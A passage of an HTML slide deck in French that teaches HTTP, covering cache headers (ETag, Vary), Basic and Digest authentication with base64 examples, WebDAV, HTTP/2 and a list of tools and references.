<pre class="server">HTTP/1.1 200 OK
<strong>ETag: "8eca4-205f-17b94c"</strong>
...</pre>
Second appel
<pre class="client">GET /logo.png HTTP/1.1
<strong>If-None-Match "8eca4-205f-17b94c"</strong>
...</pre>
<pre class="server"><strong>HTTP/1.1 304 Not Modified
ETag: "8eca4-205f-17b94c"</strong>
...</pre>
            </section>
          </div>
          <div class="slide" id="cache-vary-slide">
              <section>
              <h2>Cache : Vary</h2>
<h3>Exemple sur la compression :</h3>
<pre class="client">GET /file.js HTTP/1.1
<strong>Accept-Encoding: gzip, deflate</strong>
...</pre>
<pre class="server">HTTP/1.1 200 OK
Content-Encoding: gzip
Date: Thu, 06 Sep 2012 13:56:47 GMT
Expires: Thu, 13 Sep 2012 13:56:47 GMT
ETag: M0-0eb75f26
<strong>Vary:Accept-Encoding</strong>
...</pre>
<!-- TODO: parler de CORS qui est un bon candidat -->
            </section>
          </div>
          <div class="slide" id="cache-summary-slide">
              <section>
              <h2>Cache : Recommandations</h2>
              <ul>
                  <li>Utilisez soit <code>Expires</code>, soit <code>Cache-Control: max-age</code>
                  <li>avec soit <code>Last-Modified</code>, soit <code>ETag</code> <small>pour permettre les requêtes conditionnelles</small>
                  <li>Idéalement, cachez plusieurs mois <small>(mais pas plus d’un an)</small> et utiliser l’« url fingerprinting » <small>(version ou hash dans l’url)</small>
                  <li>Limitez les cookies aux ressources qui ont en besoin <small>(html personnalisé par client)</small>
                  <li>Ressources statiques sur un autre sous-domaine ou CDN
                  <li>Attention de bien configurer <code>Vary</code> en fonction du <code>Content-Encoding</code>, <code>Content-Type</code> ou encore sur les champs <code>Accept</code> <small>(Négociation de contenu)</small>
              </ul>
              </section>
          </div>

          <div class="slide" id="authentification-title-slide">
              <section class="middle">
              <h2>Authenfication</h2>
              </section>
          </div>
          <div class="slide" id="authentification-basic-slide">
              <section>
              <h2>Authenfication basique</h2>
<pre class="client">GET / HTTP/1.1
Host: fr.mappyrecette.com
...</pre>
<pre class="server"><strong>HTTP/1.1 401 Authorization Required
WWW-Authenticate: Basic realm="Mappy authentication"</strong>
...</pre>
<img alt="authentification box" src="imgs/authentification.png" style="border: 1px solid black;">
<h3>Encodage base 64</h3>
<kbd>$ echo -n "Aladdin:open sesame" | base64 -            # QWxhZGRpbjpvcGVuIHNlc2FtZQ==</kbd>
<pre class="client">GET / HTTP/1.1
Host: fr.mappyrecette.com
<strong>Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==</strong>
</pre>
<kbd>$ echo -n QWxhZGRpbjpvcGVuIHNlc2FtZQ== | base64 -d    # Aladdin:open sesame</kbd>
            </section>
        </div>
        <div class="slide" id="authentification-digest-slide">
            <section>
            <h2>Authenfication Digest</h2>
<pre class="server"><strong>HTTP/1.1 401 Authorization Required
WWW-Authenticate: Digest realm="testrealm@host.com",
qop="auth, auth-int",
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
opaque="5ccc069c403ebaf9f0171e9517f40e41"</strong>
Content-type: text/html
...</pre>
<pre class="server">GET /private/index.html HTTP/1.1
Host: www.exemple.org
<strong>Authorization: Digest username="paulgreg",
realm="testrealm@host.com",
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
uri="/private/index.html",
qop=auth,
nc=00000001,
cnonce="0a4f113b",
response="6629fae49393a05397450978507c4ef1",
opaque="5ccc069c403ebaf9f0171e9517f40e41"</strong>
</pre>
        </section>
        </div>

         <div class="slide" id="extension-title-slide">
             <section class="middle">
             <h2>Extension</h2>
             </section>
         </div>
          <div class="slide" id="extension-slide">
              <section>
              <h2>Extension : <abbr title="Web Distributed Authoring and Versioning">WebDAV</abbr></h2>
              <ul>
                  <li>permet de récupérer, déposer, synchroniser et publier des fichiers/dossiers,
                  <li>gestion des droits d’accès, vérrouillage des fichiers,
                  <li>Nouvelles méthodes, entêtes et codes de retour (<small><a href="//tools.ietf.org/html/rfc4918"><abbr title="Request for comment">RFC</abbr> 4918</a></small>) :
              </ul>
<pre class="client"><strong>COPY</strong> /~fielding/index.html HTTP/1.1
Host: www.example.com
Destination: http://www.example.com/users/f/fielding/index.html
If: &lt;http://www.example.com/users/f/fielding/index.html&gt; (&lt;urn:uuid:f81d4fae-7dec-11d0-a765-00a0c91e6bf6&gt;)</pre>
<pre class="server">HTTP/1.1 <strong>423 Locked</strong>
Content-Type: application/xml; charset="utf-8"
Content-Length: xxxx

&lt;?xml version="1.0" encoding="utf-8" ?&gt;
&lt;D:error xmlns:D="DAV:"&gt;
&lt;D:lock-token-submitted&gt;
&lt;D:href&gt;/locked/&lt;/D:href&gt;
&lt;/D:lock-token-submitted&gt;
&lt;/D:error&gt;
</pre>
              </section>
          </div>

          <div class="slide" id="http2-title-slide">
              <section class="middle">
              <h2>HTTP/2</h2>
              </section>
          </div>

          <div class="slide" id="h2-1-slide">
              <section>
              <h2>HTTP/2 (ou h2)</h2>
              <ul>
                  <li>Google propose <abbr title="Speedy"><a href="https://tools.ietf.org/html/draft-mbelshe-httpbis-spdy-00">SPDY</a></abbr> en <a href="http://googleresearch.blogspot.com/2009/11/2x-faster-web.html">2009</a>
                  <li>ne remplace pas HTTP mais optimise l’échange des données
                  <li>création d’un groupe de travail (httpbis) par l’IETF
                  <li>SPDY deviendra la base de HTTP/2, il sera publié en 2015 (<a href="https://tools.ietf.org/html/rfc7540">RFC7540</a>)
                  <li>rétro-compatibilité complète avec HTTP/1.1
                  <li>multiplexage (plusieurs streams) au sein d’une seule requête TCP :
                      <img src="imgs/h2-connections.png" alt="">
              </ul>
              </section>
          </div>

          <div class="slide" id="h2-2-slide">
              <section>
              <h2>HTTP/2 (ou h2)</h2>
              <ul>
                  <li>suppression des entêtes identiques entre les requêtes d’une session (<code>user-agent</code>, <code>accept</code>, etc),
                  <li>compression des entêtes via <a href="https://tools.ietf.org/html/rfc7541">HPACK</a> (conséquence : que du binaire),
                  <li>le serveur peut ré-ordonner les réponses (priorité),
                  <li>le serveur peut pousser des resources que le navigateur n’a pas demandé
                  <li>TLS obligatoire
                  <li>supporté par <a href="https://caniuse.com/#feat=http2">tous les navigateurs récents</a> <small>(même IE11)</small> et la <a href="https://github.com/http2/http2-spec/wiki/Implementations">majorité des serveurs</a> (Apache 2.4.17+, nginx 1.9.5+, Tomcat 8.5+)
              </ul>
              <!-- TODO: impact dév : plus besoin de faire des sprites, concaténation facultative -->
              </section>
          </div>

          <div class="slide" id="tools-and-resources-slide">
              <section>
              <h2>Outils et resources</h2>
              <ul>
                  <li><code>telnet</code>
                  <li><code>curl -I -XGET</code>
                  <li><code><a href="https://stedolan.github.io/jq/">jq</a></code><small> (pour le JSON)</small>
                  <li><a href="http://httpie.org">HTTPie</a> : curl pour "humain"
                  <li><a href="http://htty.github.com">htty</a> : une console http
                  <li><a href="https://web.developpez.com/tutoriels/http-2-explique/">HTTP aujourd'hui - HTTP/2 expliqué</a>
                  <li><a href="https://www.youtube.com/watch?v=KL9MR721c4w">RetourAuxSources Les cookies HTTP (par H. Sablonnière)</a>
                  <li><a href="https://http2.github.io/faq/">h2 FAQ</a>, <a href="https://http2.akamai.com/demo">h2 demo</a>, <a href="https://www.tunetheweb.com/blog/http-versus-https-versus-http2/">HTTP vs HTTPS vs H2</a>
                  <li><a href="http://rsstodolist.appspot.com/?n=http&amp;l=100">http://rsstodolist.appspot.com/?name=http</a> : toutes les références
              </ul>
              </section>
          </div>
          <!-- TODO: Mettre slides de Question / Réponse et liens vers la présentation -->

      </div>
  </div>

  <script src="js/slides.js"></script>
  <script src="js/slides.js"></script>
  <script src="js/prefixfree.min.js"></script>
  <script>
      if ('serviceWorker' in navigator) {
          navigator.serviceWorker.register('./sw.js').then(function() {
              console.log('service worker registration complete');
          }, function(e) {
              console.log('service worker registration failure:', e);
          });
      }
  </script>
  </body>
</html>